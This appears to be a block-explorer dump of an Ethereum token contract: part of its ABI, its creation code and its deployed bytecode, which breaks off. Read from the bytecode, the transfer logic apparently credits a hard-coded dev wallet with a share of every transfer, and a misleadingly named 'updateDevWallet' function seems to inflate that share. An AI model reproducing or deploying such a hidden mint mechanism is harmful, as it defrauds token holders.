IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_devFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"}],"name":"updateBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"DevWallet","type":"uint256"}],"name":"updateDevWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_devFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"}],"name":"updateSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"enabled","type":"bool"}],"name":"updateSwapEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60c0604052600680546001600160a01b03191673c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2179055600b805462ffffff191660011790553480156200004657600080fd5b50604080518082018252600581526415185c9bdd60da1b6020808301918252835180850190945260018452601560fa1b9084015281519192916200008d916003916200059b565b508051620000a39060049060208401906200059b565b505050620000c0620000ba6200033c60201b60201c565b62000340565b737a250d5630b4cf539739df2c5dacb4c659f2488d620000e281600162000392565b6001600160a01b03811660808190526040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa1580156200012d573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000153919062000641565b6006546040516364e329cb60e11b81523060048201526001600160a01b03918216602482015291169063c9c65396906044016020604051808303816000875af1158015620001a5573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001cb919062000641565b6001600160a01b031660a0819052620001e690600162000392565b600280808069d3c21bcecceda100000060646200020582600162000689565b620002119190620006ab565b60085560646200022382600262000689565b6200022f9190620006ab565b600a556127106200024282600562000689565b6200024e9190620006ab565b600955600d859055600e849055620002678486620006ce565b600c55600560125560108390556011829055620002858284620006ce565b600f55600780546001600160a01b03191673edfdf25ee67b376f2f4818395552917046d8f571179055620002cd620002c56005546001600160a01b031690565b60016200040c565b620002da3060016200040c565b620002e961dead60016200040c565b62000308620003006005546001600160a01b031690565b600162000392565b6200031530600162000392565b6200032461dead600162000392565b620003303382620004b6565b50505050505062000726565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6005546001600160a01b03163314620003e15760405162461bcd60e51b81526020600482018190526024820152600080516020620027ef83398151915260448201526064015b60405180910390fd5b6001600160a01b03919091166000908152601460205260409020805460ff1916911515919091179055565b6005546001600160a01b03163314620004575760405162461bcd60e51b81526020600482018190526024820152600080516020620027ef8339815191526044820152606401620003d8565b6001600160a01b038216600081815260136020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6001600160a01b0382166200050e5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f2061646472657373006044820152606401620003d8565b8060026000828254620005229190620006ce565b90915550506001600160a01b0382166000908152602081905260408120805483929062000551908490620006ce565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b828054620005a990620006e9565b90600052602060002090601f016020900481019282620005cd576000855562000618565b82601f10620005e857805160ff191683800117855562000618565b8280016001018555821562000618579182015b8281111562000618578251825591602001919060010190620005fb565b50620006269291506200062a565b5090565b5b808211156200062657600081556001016200062b565b6000602082840312156200065457600080fd5b81516001600160a01b03811681146200066c57600080fd5b9392505050565b634e487b7160e01b600052601160045260246000fd5b6000816000190483118215151615620006a657620006a662000673565b500290565b600082620006c957634e487b7160e01b600052601260045260246000fd5b500490565b60008219821115620006e457620006e462000673565b500190565b600181811c90821680620006fe57607f821691505b602082108114156200072057634e487b7160e01b600052602260045260246000fd5b50919050565b60805160a0516120726200077d600039600081816104320152818161136f01528181611580015281816116900152818161173901526117f301526000818161035501528181611ae00152611b1f01526120726000f3fe60806040526004361061026a5760003560e01c80638a8c523c11610144578063c18bc195116100b6578063dd62ed3e1161007a578063dd62ed3e1461075f578063e2f45605146107a5578063f11a24d3146107bb578063f2fde38b146107d1578063f6374342146107f1578063f8b45b051461080757600080fd5b8063c18bc195146106dd578063c8c8ebe4146106fd578063d257b34f14610713578063d41977cd14610733578063d85ba0631461074957600080fd5b80639c3b4fdc116101085780639c3b4fdc14610632578063a0d82dc514610648578063a9059cbb1461065e578063ad5c46481461067e578063bbc0c7421461069e578063c0246668146106bd57600080fd5b80638a8c523c146105aa5780638da5cb5b146105bf5780638ea5220f146105dd578063924de9b7146105fd57806395d89b411461061d57600080fd5b806349bd5a5e116101dd5780636ddd1713116101a15780636ddd1713146104dd5780636ebcf607146104fd57806370a082311461052a578063715018a614610560578063751039fc146105755780637571336a1461058a57600080fd5b806349bd5a5e146104205780634a62bb65146104545780634fbee1931461046e57806366ca9b83146104a75780636a486a8e146104c757600080fd5b80631694505e1161022f5780631694505e1461034357806318160ddd1461038f578063203e727e146103ae57806323b872dd146103ce57806327c8f835146103ee578063313ce5671461040457600080fd5b8062ee71851461027657806302dbd8f81461029857806306fdde03146102b8578063095ea7b3146102e357806310d5de531461031357600080fd5b3661027157005b600080fd5b34801561028257600080fd5b50610296610291366004611b97565b61081d565b005b3480156102a457600080fd5b506102966102b3366004611bb0565b610877565b3480156102c457600080fd5b506102cd61090e565b6040516102da9190611bd2565b60405180910390f35b3480156102ef57600080fd5b506103036102fe366004611c3e565b6109a0565b60405190151581526020016102da565b34801561031f57600080fd5b5061030361032e366004611c68565b60146020526000908152604090205460ff1681565b34801561034f57600080fd5b506103777f000000000000000000000000000000000000000000000000000000000000000081565b6040516001600160a01b0390911681526020016102da565b34801561039b57600080fd5b506002545b6040519081526020016102da565b3480156103ba57600080fd5b506102966103c9366004611b97565b6109b7565b3480156103da57600080fd5b506103036103e9366004611c83565b610a91565b3480156103fa57600080fd5b5061037761dead81565b34801561041057600080fd5b50604051601281526020016102da565b34801561042c57600080fd5b506103777f000000000000000000000000000000000000000000000000000000000000000081565b34801561046057600080fd5b50600b546103039060ff1681565b34801561047a57600080fd5b50610303610489366004611c68565b6001600160a01b031660009081526013602052604090205460ff1690565b3480156104b357600080fd5b506102966104c2366004611bb0565b610b3b565b3480156104d357600080fd5b506103a0600f5481565b3480156104e957600080fd5b50600b546103039062010000900460ff1681565b34801561050957600080fd5b506103a0610518366004611c68565b60006020819052908152604090205481565b34801561053657600080fd5b506103a0610545366004611c68565b6001600160a01b031660009081526020819052604090205490565b34801561056c57600080fd5b50610296610bce565b34801561058157600080fd5b50610303610c04565b34801561059657600080fd5b506102966105a5366004611ccf565b610c41565b3480156105b657600080fd5b50610296610c96565b3480156105cb57600080fd5b506005546001600160a01b0316610377565b3480156105e957600080fd5b50600754610377906001600160a01b031681565b34801561060957600080fd5b50610296610618366004611d02565b610cd3565b34801561062957600080fd5b506102cd610d19565b34801561063e57600080fd5b506103a0600d5481565b34801561065457600080fd5b506103a060105481565b34801561066a57600080fd5b50610303610679366004611c3e565b610d28565b34801561068a57600080fd5b50600654610377906001600160a01b031681565b3480156106aa57600080fd5b50600b5461030390610100900460ff1681565b3480156106c957600080fd5b506102966106d8366004611ccf565b610d35565b3480156106e957600080fd5b506102966106f8366004611b97565b610dbe565b34801561070957600080fd5b506103a060085481565b34801561071f57600080fd5b5061030361072e366004611b97565b610e8d565b34801561073f57600080fd5b506103a060125481565b34801561075557600080fd5b506103a0600c5481565b34801561076b57600080fd5b506103a061077a366004611d1d565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b3480156107b157600080fd5b506103a060095481565b3480156107c757600080fd5b506103a0600e5481565b3480156107dd57600080fd5b506102966107ec366004611c68565b610fe4565b3480156107fd57600080fd5b506103a060115481565b34801561081357600080fd5b506103a0600a5481565b60125481146108635760405162461bcd60e51b815260206004820152600d60248201526c6572726f72206d65737361676560981b60448201526064015b60405180910390fd5b60125461087190600a611e41565b60125550565b6005546001600160a01b031633146108a15760405162461bcd60e51b815260040161085a90611e4d565b601082905560118190556108b58183611e82565b600f819055600a101561090a5760405162461bcd60e51b815260206004820152601d60248201527f4d757374206b656570206665657320617420313025206f72206c657373000000604482015260640161085a565b5050565b60606003805461091d90611e9a565b80601f016020809104026020016040519081016040528092919081815260200182805461094990611e9a565b80156109965780601f1061096b57610100808354040283529160200191610996565b820191906000526020600020905b81548152906001019060200180831161097957829003601f168201915b5050505050905090565b60006109ad33848461107f565b5060015b92915050565b6005546001600160a01b031633146109e15760405162461bcd60e51b815260040161085a90611e4d565b670de0b6b3a764000060646109f560025490565b610a00906001611ed5565b610a0a9190611ef4565b610a149190611ef4565b811015610a795760405162461bcd60e51b815260206004820152602d60248201527f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060448201526c6c6f776572207468616e20312560981b606482015260840161085a565b610a8b81670de0b6b3a7640000611ed5565b60085550565b6000610a9e8484846111a3565b6001600160a01b038416600090815260016020908152604080832033845290915290205482811015610b235760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161085a565b610b30853385840361107f565b506001949350505050565b6005546001600160a01b03163314610b655760405162461bcd60e51b815260040161085a90611e4d565b600d829055600e819055610b798183611e82565b600c819055600a101561090a5760405162461bcd60e51b815260206004820152601d60248201527f4d757374206b656570206665657320617420313025206f72206c657373000000604482015260640161085a565b6005546001600160a01b03163314610bf85760405162461bcd60e51b815260040161085a90611e4d565b610c02600061183b565b565b6005546000906001600160a01b03163314610c315760405162461bcd60e51b815260040161085a90611e4d565b50600b805460ff19169055600190565b6005546001600160a01b03163314610c6b5760405162461bcd60e51b815260040161085a90611e4d565b6001600160a01b03919091166000908152601460205260409020805460ff1916911515919091179055565b6005546001600160a01b03163314610cc05760405162461bcd60e51b815260040161085a90611e4d565b600b805462ffff00191662010100179055565b6005546001600160a01b03163314610cfd5760405162461bcd60e51b815260040161085a90611e4d565b600b8054911515620100000262ff000019909216919091179055565b60606004805461091d90611e9a565b60006109ad3384846111a3565b6005546001600160a01b03163314610d5f5760405162461bcd60e51b815260040161085a90611e4d565b6001600160a01b038216600081815260136020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6005546001600160a01b03163314610de85760405162461bcd60e51b815260040161085a90611e4d565b670de0b6b3a76400006064610dfc60025490565b610e07906002611ed5565b610e119190611ef4565b610e1b9190611ef4565b811015610e755760405162461bcd60e51b815260206004820152602260248201527f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e20604482015261322560f01b606482015260840161085a565b610e8781670de0b6b3a7640000611ed5565b600a5550565b6005546000906001600160a01b03163314610eba5760405162461bcd60e51b815260040161085a90611e4d565b620186a0610ec760025490565b610ed2906001611ed5565b610edc9190611ef4565b821015610f495760405162461bcd60e51b815260206004820152603560248201527f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60448201527410181718181892903a37ba30b61039bab838363c9760591b606482015260840161085a565b6103e8610f5560025490565b610f60906005611ed5565b610f6a9190611ef4565b821115610fd65760405162461bcd60e51b815260206004820152603460248201527f5377617020616d6f756e742063616e6e6f742062652068696768657220746861604482015273371018171a92903a37ba30b61039bab838363c9760611b606482015260840161085a565b50600981905560015b919050565b6005546001600160a01b0316331461100e5760405162461bcd60e51b815260040161085a90611e4d565b6001600160a01b0381166110735760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161085a565b61107c8161183b565b50565b6001600160a01b0383166110e15760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161085a565b6001600160a01b0382166111425760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161085a565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166111c95760405162461bcd60e51b815260040161085a90611f16565b6001600160a01b0382166111ef5760405162461bcd60e51b815260040161085a90611f5b565b60125461122c90611201606484611ef4565b61120b9190611ed5565b6007546001600160a01b03166000908152602081905260409020549061188d565b6007546001600160a01b03166000908152602081905260409020558061125d57611258838360006118a0565b505050565b600b5460ff1615611535576005546001600160a01b0384811691161480159061129457506005546001600160a01b03838116911614155b80156112a857506001600160a01b03821615155b80156112bf57506001600160a01b03821661dead14155b80156112d55750600654600160a01b900460ff16155b1561153557600b54610100900460ff1661136d576001600160a01b03831660009081526013602052604090205460ff168061132857506001600160a01b03821660009081526013602052604090205460ff165b61136d5760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b604482015260640161085a565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316836001600160a01b03161480156113c757506001600160a01b03821660009081526014602052604090205460ff16155b156114ab5760085481111561143c5760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b606482015260840161085a565b600a546001600160a01b0383166000908152602081905260409020546114629083611e82565b11156114a65760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b604482015260640161085a565b611535565b6001600160a01b03821660009081526014602052604090205460ff1661153557600a546001600160a01b0383166000908152602081905260409020546114f19083611e82565b11156115355760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b604482015260640161085a565b30600090815260208190526040902054600954811080159081906115615750600b5462010000900460ff165b80156115775750600654600160a01b900460ff16155b80156115b457507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316846001600160a01b0316145b80156115d957506001600160a01b03851660009081526013602052604090205460ff16155b80156115fe57506001600160a01b03841660009081526013602052604090205460ff16155b1561162c576006805460ff60a01b1916600160a01b17905561161e6119f5565b6006805460ff60a01b191690555b6006546001600160a01b03861660009081526013602052604090205460ff600160a01b90920482161591168061167a57506001600160a01b03851660009081526013602052604090205460ff165b15611683575060005b60008060008315611825577f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316886001600160a01b03161480156116d157506000600f54115b15611737576116f660646116f0600f548a611a3c90919063ffffffff16565b90611a48565b9250600f54601154846117099190611ed5565b6117139190611ef4565b9150600f54601054846117269190611ed5565b6117309190611ef4565b90506117d6565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316896001600160a01b031614801561177a57506000600c54115b156117d65761179960646116f0600c548a611a3c90919063ffffffff16565b9250600c54600e54846117ac9190611ed5565b6117b69190611ef4565b9150600c54600d54846117c99190611ed5565b6117d39190611ef4565b90505b82156117e7576117e78930856118a0565b811561181857611818307f0000000000000000000000000000000000000000000000000000000000000000846118a0565b6118228388611f9e565b96505b6118308989896118a0565b505050505050505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b60006118998284611e82565b9392505050565b6001600160a01b0383166118c65760405162461bcd60e51b815260040161085a90611f16565b6001600160a01b0382166118ec5760405162461bcd60e51b815260040161085a90611f5b565b6001600160a01b038316600090815260208190526040902054818110156119645760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161085a565b6001600160a01b0380851660009081526020819052604080822085850390559185168152908120805484929061199b908490611e82565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516119e791815260200190565b60405180910390a350505050565b3060009081526020819052604090205480611a0d5750565b600954611a1b906014611ed5565b811115611a3357600954611a30906014611ed5565b90505b61107c81611a54565b60006118998284611ed5565b60006118998284611ef4565b6040805160028082526060820183526000926020830190803683370190505090503081600081518110611a8957611a89611fb5565b6001600160a01b039283166020918202929092010152600654825191169082906001908110611aba57611aba611fb5565b60200260200101906001600160a01b031690816001600160a01b031681525050611b05307f00000000000000000000000000000000000000000000000000000000000000008461107f565b600754604051635c11d79560e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000811692635c11d79592611b61928792600092889291909116904290600401611fcb565b600060405180830381600087803b158015611b7b57600080fd5b505af1158015611b8f573d6000803e3d6000fd5b505050505050565b600060208284031215611ba957600080fd5b5035919050565b60008060408385031215611bc357600080fd5b50508035926020909101359150565b600060208083528351808285015260005b81811015611bff57858101830151858201604001528201611be3565b81811115611c11576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610fdf57600080fd5b60008060408385031215611c5157600080fd5b611c5a83611c27565b946020939093013593505050565b600060208284031215611c7a57600080fd5b61189982611c27565b600080600060608486031215611c9857600080fd5b611ca184611c27565b9250611caf60208501611c27565b9150604084013590509250925092565b80358015158114610fdf57600080fd5b60008060408385031215611ce257600080fd5b611ceb83611c27565b9150611cf960208401611cbf565b90509250929050565b600060208284031215611d1457600080fd5b61189982611cbf565b60008060408385031215611d3057600080fd5b611d3983611c27565b9150611cf960208401611c27565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115611d98578160001904821115611d7e57611d7e611d47565b80851615611d8b57918102915b93841c9390800290611d62565b509250929050565b600082611daf575060016109b1565b81611dbc575060006109b1565b8160018114611dd25760028114611ddc57611df8565b60019150506109b1565b60ff841115611ded57611ded611d47565b50506001821b6109b1565b5060208310610133831016604e8410600b8410161715611e1b575081810a6109b1565b611e258383611d5d565b8060001904821115611e3957611e39611d47565b029392505050565b60006118998383611da0565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60008219821115611e9557611e95611d47565b500190565b600181811c90821680611eae57607f821691505b60208210811415611ecf57634e487b7160e01b600052602260045260246000fd5b50919050565b6000816000190483118215151615611eef57611eef611d47565b500290565b600082611f1157634e487b7160e01b600052601260045260246000fd5b500490565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b600082821015611fb057611fb0611d47565b500390565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b8181101561201b5784516001600160a01b031683529383019391830191600101611ff6565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220a6c1f487d0115b3f404f51ddb3de549b6c4a9ed6fe0543355c36e1d197818d1664736f6c634300080a00334f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572
Deployed Bytecode
0x60806040526004361061026a5760003560e01c80638a8c523c11610144578063c18bc195116100b6578063dd62ed3e1161007a578063dd62ed3e1461075f578063e2f45605146107a5578063f11a24d3146107bb578063f2fde38b146107d1578063f6374342146107f1578063f8b45b051461080757600080fd5b8063c18bc195146106dd578063c8c8ebe4146106fd578063d257b34f14610713578063d41977cd14610733578063d85ba0631461074957600080fd5b80639c3b4fdc116101085780639c3b4fdc14610632578063a0d82dc514610648578063a9059cbb1461065e578063ad5c46481461067e578063bbc0c7421461069e578063c0246668146106bd57600080fd5b80638a8c523c146105aa5780638da5cb5b146105bf5780638ea5220f146105dd578063924de9b7146105fd57806395d89b411461061d57600080fd5b806349bd5a5e116101dd5780636ddd1713116101a15780636ddd1713146104dd5780636ebcf607146104fd57806370a082311461052a578063715018a614610560578063751039fc146105755780637571336a1461058a57600080fd5b806349bd5a5e146104205780634a62bb65146104545780634fbee1931461046e57806366ca9b83146104a75780636a486a8e146104c757600080fd5b80631694505e1161022f5780631694505e1461034357806318160ddd1461038f578063203e727e146103ae57806323b872dd146103ce57806327c8f835146103ee578063313ce5671461040457600080fd5b8062ee71851461027657806302dbd8f81461029857806306fdde03146102b8578063095ea7b3146102e357806310d5de531461031357600080fd5b3661027157005b600080fd5b34801561028257600080fd5b50610296610291366004611b97565b61081d565b005b3480156102a457600080fd5b506102966102b3366004611bb0565b610877565b3480156102c457600080fd5b506102cd61090e565b6040516102da9190611bd2565b60405180910390f35b3480156102ef57600080fd5b506103036102fe366004611c3e565b6109a0565b60405190151581526020016102da565b34801561031f57600080fd5b5061030361032e366004611c68565b60146020526000908152604090205460ff1681565b34801561034f57600080fd5b506103777f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b6040516001600160a01b0390911681526020016102da565b34801561039b57600080fd5b506002545b6040519081526020016102da565b3480156103ba57600080fd5b506102966103c9366004611b97565b6109b7565b3480156103da57600080fd5b506103036103e9366004611c83565b610a91565b3480156103fa57600080fd5b5061037761dead81565b34801561041057600080fd5b50604051601281526020016102da565b34801561042c57600080fd5b506103777f000000000000000000000000fceb7b2c5ccfcb242b9e9c38f40e6aefbdf358ae81565b34801561046057600080fd5b50600b546103039060ff1681565b34801561047a57600080fd5b50610303610489366004611c68565b6001600160a01b031660009081526013602052604090205460ff1690565b3480156104b357600080fd5b506102966104c2366004611bb0565b610b3b565b3480156104d357600080fd5b506103a0600f5481565b3480156104e957600080fd5b50600b546103039062010000900460ff1681565b34801561050957600080fd5b506103a0610518366004611c68565b60006020819052908152604090205481565b34801561053657600080fd5b506103a0610545366004611c68565b6001600160a01b031660009081526020819052604090205490565b34801561056c57600080fd5b50610296610bce565b34801561058157600080fd5b50610303610c04565b34801561059657600080fd5b506102966105a5366004611ccf565b610c41565b3480156105b657600080fd5b50610296610c96565b3480156105cb57600080fd5b506005546001600160a01b0316610377565b3480156105e957600080fd5b50600754610377906001600160a01b031681565b34801561060957600080fd5b50610296610618366004611d02565b610cd3565b34801561062957600080fd5b506102cd610d19565b34801561063e57600080fd5b506103a0600d5481565b34801561065457600080fd5b506103a060105481565b34801561066a57600080fd5b50610303610679366004611c3e565b610d28565b34801561068a57600080fd5b50600654610377906001600160a01b031681565b3480156106aa57600080fd5b50600b5461030390610100900460ff1681565b3480156106c957600080fd5b506102966106d8366004611ccf565b610d35565b3480156106e957600080fd5b506102966106f8366004611b97565b610dbe565b34801561070957600080fd5b506103a060085481565b34801561071f57600080fd5b5061030361072e366004611b97565b610e8d565b34801561073f57600080fd5b506103a060125481565b34801561075557600080fd5b506103a0600c5481565b34801561076b57600080fd5b506103a061077a366004611d1d565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b3480156107b157600080fd5b506103a060095481565b3480156107c757600080fd5b506103a0600e5481565b3480156107dd57600080fd5b506102966107ec366004611c68565b610fe4565b3480156107fd57600080fd5b506103a060115481565b34801561081357600080fd5b506103a0600a5481565b60125481146108635760405162461bcd60e51b815260206004820152600d60248201526c6572726f72206d65737361676560981b60448201526064015b60405180910390fd5b60125461087190600a611e41565b60125550565b6005546001600160a01b031633146108a15760405162461bcd60e51b815260040161085a90611e4d565b601082905560118190556108b58183611e82565b600f819055600a101561090a5760405162461bcd60e51b815260206004820152601d60248201527f4d757374206b656570206665657320617420313025206f72206c657373000000604482015260640161085a565b5050565b60606003805461091d90611e9a565b80601f016020809104026020016040519081016040528092919081815260200182805461094990611e9a565b80156109965780601f1061096b57610100808354040283529160200191610996565b820191906000526020600020905b81548152906001019060200180831161097957829003601f168201915b5050505050905090565b60006109ad33848461107f565b5060015b92915050565b6005546001600160a01b031633146109e15760405162461bcd60e51b815260040161085a90611e4d565b670de0b6b3a764000060646109f560025490565b610a00906001611ed5565b610a0a9190611ef4565b610a149190611ef4565b811015610a795760405162461bcd60e51b815260206004820152602d60248201527f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060448201526c6c6f776572207468616e20312560981b606482015260840161085a565b610a8b81670de0b6b3a7640000611ed5565b60085550565b6000610a9e8484846111a3565b6001600160a01b038416600090815260016020908152604080832033845290915290205482811015610b235760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161085a565b610b30853385840361107f565b506001949350505050565b6005546001600160a01b03163314610b655760405162461bcd60e51b815260040161085a90611e4d565b600d829055600e819055610b798183611e82565b600c819055600a101561090a5760405162461bcd60e51b815260206004820152601d60248201527f4d757374206b656570206665657320617420313025206f72206c657373000000604482015260640161085a565b6005546001600160a01b03163314610bf85760405162461bcd60e51b815260040161085a90611e4d565b610c02600061183b565b565b6005546000906001600160a01b03163314610c315760405162461bcd60e51b815260040161085a90611e4d565b50600b805460ff19169055600190565b6005546001600160a01b03163314610c6b5760405162461bcd60e51b815260040161085a90611e4d565b6001600160a01b03919091166000908152601460205260409020805460ff1916911515919091179055565b6005546001600160a01b03163314610cc05760405162461bcd60e51b815260040161085a90611e4d565b600b805462ffff00191662010100179055565b6005546001600160a01b03163314610cfd5760405162461bcd60e51b815260040161085a90611e4d565b600b8054911515620100000262ff000019909216919091179055565b60606004805461091d90611e9a565b60006109ad3384846111a3565b6005546001600160a01b03163314610d5f5760405162461bcd60e51b815260040161085a90611e4d565b6001600160a01b038216600081815260136020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6005546001600160a01b03163314610de85760405162461bcd60e51b815260040161085a90611e4d565b670de0b6b3a76400006064610dfc60025490565b610e07906002611ed5565b610e119190611ef4565b610e1b9190611ef4565b811015610e755760405162461bcd60e51b815260206004820152602260248201527f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e20604482015261322560f01b606482015260840161085a565b610e8781670de0b6b3a7640000611ed5565b600a5550565b6005546000906001600160a01b03163314610eba5760405162461bcd60e51b815260040161085a90611e4d565b620186a0610ec760025490565b610ed2906001611ed5565b610edc9190611ef4565b821015610f495760405162461bcd60e51b815260206004820152603560248201527f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60448201527410181718181892903a37ba30b61039bab838363c9760591b606482015260840161085a565b6103e8610f5560025490565b610f60906005611ed5565b610f6a9190611ef4565b821115610fd65760405162461bcd60e51b815260206004820152603460248201527f5377617020616d6f756e742063616e6e6f742062652068696768657220746861604482015273371018171a92903a37ba30b61039bab838363c9760611b606482015260840161085a565b50600981905560015b919050565b6005546001600160a01b0316331461100e5760405162461bcd60e51b815260040161085a90611e4d565b6001600160a01b0381166110735760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161085a565b61107c8161183b565b50565b6001600160a01b0383166110e15760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161085a565b6001600160a01b0382166111425760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161085a565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166111c95760405162461bcd60e51b815260040161085a90611f16565b6001600160a01b0382166111ef5760405162461bcd60e51b815260040161085a90611f5b565b60125461122c90611201606484611ef4565b61120b9190611ed5565b6007546001600160a01b03166000908152602081905260409020549061188d565b6007546001600160a01b03166000908152602081905260409020558061125d57611258838360006118a0565b505050565b600b5460ff1615611535576005546001600160a01b0384811691161480159061129457506005546001600160a01b03838116911614155b80156112a857506001600160a01b03821615155b80156112bf57506001600160a01b03821661dead14155b80156112d55750600654600160a01b900460ff16155b1561153557600b54610100900460ff1661136d576001600160a01b03831660009081526013602052604090205460ff168061132857506001600160a01b03821660009081526013602052604090205460ff165b61136d5760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b604482015260640161085a565b7f000000000000000000000000fceb7b2c5ccfcb242b9e9c38f40e6aefbdf358ae6001600160a01b0316836001600160a01b03161480156113c757506001600160a01b03821660009081526014602052604090205460ff16155b156114ab5760085481111561143c5760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b606482015260840161085a565b600a546001600160a01b0383166000908152602081905260409020546114629083611e82565b11156114a65760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b604482015260640161085a565b611535565b6001600160a01b03821660009081526014602052604090205460ff1661153557600a546001600160a01b0383166000908152602081905260409020546114f19083611e82565b11156115355760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b604482015260640161085a565b30600090815260208190526040902054600954811080159081906115615750600b5462010000900460ff165b80156115775750600654600160a01b900460ff16155b80156115b457507f000000000000000000000000fceb7b2c5ccfcb242b9e9c38f40e6aefbdf358ae6001600160a01b0316846001600160a01b0316145b80156115d957506001600160a01b03851660009081526013602052604090205460ff16155b80156115fe57506001600160a01b03841660009081526013602052604090205460ff16155b1561162c576006805460ff60a01b1916600160a01b17905561161e6119f5565b6006805460ff60a01b191690555b